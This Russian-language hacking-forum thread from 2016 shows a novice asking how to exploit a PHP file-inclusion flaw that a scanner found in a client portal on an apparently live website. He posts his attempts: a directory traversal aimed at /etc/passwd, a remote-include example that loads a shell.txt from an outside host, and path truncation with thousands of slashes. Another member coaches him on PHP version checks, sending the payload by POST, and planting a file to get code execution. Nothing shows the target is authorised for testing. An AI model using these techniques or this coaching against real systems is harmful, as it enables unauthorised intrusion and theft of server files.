HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 23.02.2016, 09:45
.Light.
Guest
Сообщений: n/a
Провел на форуме:
65956

Репутация: 0
По умолчанию

как быть с этим?

File inclusion

Vulnerability description

This script is possibly vulnerable to file inclusion attacks.

It seems that this script includes a file which name is determined using user-supplied data. This data is not properly validated before being passed to the include function.

This vulnerability affects /client-portal/.

Discovered by: Scripting (File_Inclusion.script).

Attack details

Cookie input FxOACPLang was set to http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

Pattern found:

Failed opening required '/home/admin/web/public_html/location/http://some-inexistent-website.acu/s..._name?.jpg.php'

Ошибка

Warning: require_once(/home/admin/web/site/public_html/client-portal/location/http:/image.php.php): failed to open stream: No such file or directory in /home/admin/public_html/client-portal/initialize.php(1) : eval()'d code(1) : eval()'d code(1) : eval()'d codeon line 21

Fatal error: require_once(): Failed opening required '/home/admin/web/site/public_html/client-portal/location/http://image.php.php' (include_path='.:/usr/share/php:/usr/share/pear') in /home/admin/web/public_html/client-portal/initialize.php(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code on line 21

Пробую вот так ничего не вывыходит(

Fatal error: require_once(): Failed opening required '/home/admin/web/site/public_html/client-portal/location/../../../../../../../etc/passwd' (include_path='.:/usr/share/php:/usr/share/pear') in /home/admin/web/site/public_html/client-portal/initialize.php(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code on line 21
 
Ответить с цитированием

  #2  
Старый 23.02.2016, 10:16
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

открыть уже статью по инклудам, нет?
 
Ответить с цитированием

  #3  
Старый 23.02.2016, 10:20
.Light.
Guest
Сообщений: n/a
Провел на форуме:
65956

Репутация: 0
По умолчанию

Цитата:
Сообщение от yarbabin  
yarbabin said:

открыть уже статью по инклудам, нет?
Читал,смотрел не получается ((((Подскажите плз что делать

Везде в примерах идет ?page=http://site.ru/shell.txt

А у меня /location/

Подскажите таким методом

/public_html/client-portal/location/http://site/image.txt.php

Файл загружается на сервер?
 
Ответить с цитированием

  #4  
Старый 23.02.2016, 11:31
blackbox
Guest
Сообщений: n/a
Провел на форуме:
137056

Репутация: 11
По умолчанию

Цитата:
Сообщение от .Light.  
.Light. said:

Читал,смотрел не получается ((((Подскажите плз что делать
Везде в примерах идет ?page=
http://site.ru/shell.txt
А у меня /location/
Подскажите таким методом
/public_html/client-portal/location/
http://site/image.txt.php
Файл загружается на сервер?
Очевидно же что тут инклуд локальный и расширение файла ".php" (в первом посте видно). В новых версиях пхп его обрезать нельзя емнип, поэтому нужно еще какую-нибудь уязвимость использовать вместе с этой, чтобы код свой выполнить.
 
Ответить с цитированием

  #5  
Старый 23.02.2016, 11:34
.Light.
Guest
Сообщений: n/a
Провел на форуме:
65956

Репутация: 0
По умолчанию

Цитата:
Сообщение от blackbox  
blackbox said:

Очевидно же что тут инклуд локальный и расширение файла ".php" (в первом посте видно). В новых версиях пхп его обрезать нельзя емнип, поэтому нужно еще какую-нибудь уязвимость использовать вместе с этой, чтобы код свой выполнить.
Значит это просто раскрытие путей?
 
Ответить с цитированием

  #6  
Старый 23.02.2016, 11:37
blackbox
Guest
Сообщений: n/a
Провел на форуме:
137056

Репутация: 11
По умолчанию

Цитата:
Сообщение от .Light.  
.Light. said:

Значит это просто раскрытие путей?
Нет, раскрытие путей есть конечно же, но это инклуд.
 
Ответить с цитированием

  #7  
Старый 23.02.2016, 11:38
.Light.
Guest
Сообщений: n/a
Провел на форуме:
65956

Репутация: 0
По умолчанию

Цитата:
Сообщение от blackbox  
blackbox said:

Нет, раскрытие путей есть конечно же, но это инклуд.
Так как им воспользоваться?) я уде все перепробывал.Я чтото делаю не так.Это мой первый инклуд)Ребят помогите плз

Я могу открывать только php файлы

400 Bad Request

Request Header Or Cookie Too Large nginx

это когда 4096 слешей
 
Ответить с цитированием

  #8  
Старый 23.02.2016, 14:51
blackbox
Guest
Сообщений: n/a
Провел на форуме:
137056

Репутация: 11
По умолчанию

Цитата:
Сообщение от .Light.  
.Light. said:

Так как им воспользоваться?) я уде все перепробывал.Я чтото делаю не так.Это мой первый инклуд)Ребят помогите плз
Я могу открывать только php файлы
400 Bad Request
Request Header Or Cookie Too Large nginx
это когда 4096 слешей
Во-первых нужно узнать версию php, чтобы понять, можно ли воспользоваться трюком со слешами (там кстати свои особенности). Вот еще хорошая статья: https://intsystem.org/security/issle...e-php-include/. Вот еще нужно почитать это: https://rdot.org/forum/showthread.php?t=343&page=3. Но самое главное, это то что nginx не принимает такой большой запрос - тут я не знаю как выкрутится, можно попробовать послать POST запрос, если имя файла для подключение берется из $_REQUEST а не из $_GET, в чем я лично сомневаюсь. В любом случае слеш с точками можно через пост попробовать. А так даже не уверен, пусть олдфаги подскажут.
 
Ответить с цитированием

  #9  
Старый 23.02.2016, 21:00
.Light.
Guest
Сообщений: n/a
Провел на форуме:
65956

Репутация: 0
По умолчанию

Цитата:
Сообщение от blackbox  
blackbox said:

Во-первых нужно узнать версию php, чтобы понять, можно ли воспользоваться трюком со слешами (там кстати свои особенности). Вот еще хорошая статья:
https://intsystem.org/security/issle...e-php-include/
. Вот еще нужно почитать это:
https://rdot.org/forum/showthread.php?t=343&page=3
. Но самое главное, это то что nginx не принимает такой большой запрос - тут я не знаю как выкрутится, можно попробовать послать POST запрос, если имя файла для подключение берется из $_REQUEST а не из $_GET, в чем я лично сомневаюсь. В любом случае слеш с точками можно через пост попробовать. А так даже не уверен, пусть олдфаги подскажут.
не помогает(
 
Ответить с цитированием

  #10  
Старый 23.02.2016, 22:41
blackbox
Guest
Сообщений: n/a
Провел на форуме:
137056

Репутация: 11
По умолчанию

Цитата:
Сообщение от .Light.  
.Light. said:

не помогает(
Ну вообще такие вещи неплохо у себя на локалхосте пробовать а не сразу в боевых условиях. А как быть с nginx - не знаю, возможно следует копать в другую сторону: например искать как можно создать файл на сервере с нужным расширением.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ